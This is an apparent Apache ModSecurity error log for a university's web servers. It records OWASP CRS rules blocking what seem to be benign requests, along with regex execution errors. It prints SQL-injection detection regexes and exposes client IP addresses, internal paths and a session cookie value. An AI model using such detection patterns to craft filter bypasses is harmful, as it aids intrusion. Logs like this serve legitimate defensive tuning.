[Tue Aug 29 09:41:33.573058 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3cCo-f0AAPlpRiAAAAAS"]
[Tue Aug 29 09:41:33.764708 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3cCo-f0AAPlpRiEAAAAS"]
[Tue Aug 29 09:41:33.980600 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3cCo-f0AAPlpRiIAAAAS"]
[Tue Aug 29 09:41:34.073185 2023] [:error] [pid 63692] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:tglkuitansi. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS:tglkuitansi: 2023-08-29T00:00:00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/save"] [unique_id "ZO1a3sCo-f0AAPjMteAAAAAn"]
[Tue Aug 29 09:41:34.172829 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3sCo-f0AAPlpRiMAAAAS"]
[Tue Aug 29 09:41:39.358938 2023] [:error] [pid 63712] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a48Co-f0AAPjgw4EAAAAC"]
[Tue Aug 29 09:41:39.516486 2023] [:error] [pid 63712] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a48Co-f0AAPjgw4IAAAAC"]
[Tue Aug 29 09:41:39.683851 2023] [:error] [pid 63712] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a48Co-f0AAPjgw4MAAAAC"]
[Tue Aug 29 09:41:54.979004 2023] [:error] [pid 63880] [client 114.5.212.176] ModSecurity: Rule 7fe1c6617ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpanambilsks"] [unique_id "ZO1a8sCo-f0AAPmIs2IAAAAU"]
[Tue Aug 29 09:41:59.886613 2023] [:error] [pid 63887] [client 203.176.176.235] ModSecurity: Rule 7fe1ce528160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1a98Co-f0AAPmPSrcAAAAF"]
[Tue Aug 29 09:41:59.886712 2023] [:error] [pid 63887] [client 203.176.176.235] ModSecurity: Rule 7fe1ce528160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1a98Co-f0AAPmPSrcAAAAF"]
[Tue Aug 29 09:42:39.525954 2023] [:error] [pid 63885] [client 203.176.176.235] ModSecurity: Rule 7fe1c6617ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpansetujusks"] [unique_id "ZO1bH8Co-f0AAPmNDycAAAAC"]
[Tue Aug 29 09:43:59.894398 2023] [:error] [pid 64052] [client 203.176.176.235] ModSecurity: Rule 7fe1ce51a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1bb8Co-f0AAPo0NgcAAAAA"]
[Tue Aug 29 09:43:59.894568 2023] [:error] [pid 64052] [client 203.176.176.235] ModSecurity: Rule 7fe1ce51a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1bb8Co-f0AAPo0NgcAAAAA"]
[Tue Aug 29 09:45:59.904927 2023] [:error] [pid 64066] [client 203.176.176.235] ModSecurity: Rule 7fe1ce51a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1b58Co-f0AAPpCN88AAAAL"]
[Tue Aug 29 09:45:59.905020 2023] [:error] [pid 64066] [client 203.176.176.235] ModSecurity: Rule 7fe1ce51a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1b58Co-f0AAPpCN88AAAAL"]
[Tue Aug 29 09:48:00.346544 2023] [:error] [pid 64057] [client 203.176.176.235] ModSecurity: Rule 7fe1ce51a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1cYMCo-f0AAPo5KtQAAAAH"]
[Tue Aug 29 09:48:00.346620 2023] [:error] [pid 64057] [client 203.176.176.235] ModSecurity: Rule 7fe1ce51a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1cYMCo-f0AAPo5KtQAAAAH"]
[Tue Aug 29 09:49:59.929136 2023] [:error] [pid 64141] [client 203.176.176.235] ModSecurity: Rule 7fe1ce51a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1c18Co-f0AAPqNfBQAAAAK"]
[Tue Aug 29 09:49:59.929225 2023] [:error] [pid 64141] [client 203.176.176.235] ModSecurity: Rule 7fe1ce51a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1c18Co-f0AAPqNfBQAAAAK"]
[Tue Aug 29 09:51:01.678089 2023] [:error] [pid 64166] [client 203.176.176.235] ModSecurity: Rule 7fe1c5e52ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpansetujusks"] [unique_id "ZO1dFcCo-f0AAPqmcdwAAAAi"]
[Tue Aug 29 09:51:33.582323 2023] [:error] [pid 64165] [client 203.176.176.235] ModSecurity: Rule 7fe1c5e52ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpansetujusks"] [unique_id "ZO1dNcCo-f0AAPqlIYIAAAAh"]
[Tue Aug 29 09:59:11.856205 2023] [:error] [pid 64274] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1e-8Co-f0AAPsSWkwAAAAH"]
[Tue Aug 29 09:59:11.856292 2023] [:error] [pid 64274] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1e-8Co-f0AAPsSWkwAAAAH"]
[Tue Aug 29 10:00:11.830104 2023] [:error] [pid 64241] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1fO8Co-f0AAPrxgJ8AAAAE"]
[Tue Aug 29 10:00:11.830201 2023] [:error] [pid 64241] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1fO8Co-f0AAPrxgJ8AAAAE"]
[Tue Aug 29 10:01:11.797619 2023] [:error] [pid 64346] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1fd8Co-f0AAPtaj4MAAAAQ"]
[Tue Aug 29 10:01:11.797705 2023] [:error] [pid 64346] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1fd8Co-f0AAPtaj4MAAAAQ"]
[Tue Aug 29 10:03:11.807700 2023] [:error] [pid 64274] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1f78Co-f0AAPsSWoYAAAAH"]
[Tue Aug 29 10:03:11.807788 2023] [:error] [pid 64274] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1f78Co-f0AAPsSWoYAAAAH"]
[Tue Aug 29 10:05:11.808546 2023] [:error] [pid 64354] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1gZ8Co-f0AAPtipeoAAAAF"]
[Tue Aug 29 10:05:11.808620 2023] [:error] [pid 64354] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1gZ8Co-f0AAPtipeoAAAAF"]
[Tue Aug 29 10:07:11.816138 2023] [:error] [pid 64354] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1g38Co-f0AAPtipe0AAAAF"]
[Tue Aug 29 10:07:11.816274 2023] [:error] [pid 64354] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1g38Co-f0AAPtipe0AAAAF"]
[Tue Aug 29 10:09:06.038368 2023] [:error] [pid 64396] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1hUsCo-f0AAPuMLhwAAAAO"]
[Tue Aug 29 10:09:06.038478 2023] [:error] [pid 64396] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1hUsCo-f0AAPuMLhwAAAAO"]
[Tue Aug 29 10:10:06.898545 2023] [:error] [pid 64399] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1hjsCo-f0AAPuPP30AAAAT"]
[Tue Aug 29 10:10:06.898632 2023] [:error] [pid 64399] [client 203.176.176.235] ModSecurity: Rule 7fe1ce50a160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1hjsCo-f0AAPuPP30AAAAT"]
[Tue Aug 29 10:13:29.273317 2023] [:error] [pid 64574] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZO1iWcCo-f0AAPw@lioAAAAK"]
[Tue Aug 29 10:13:33.610855 2023] [:error] [pid 64574] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZO1iXcCo-f0AAPw@lisAAAAK"]
[Tue Aug 29 10:13:54.166415 2023] [:error] [pid 64569] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZO1icsCo-f0AAPw51hoAAAAF"]
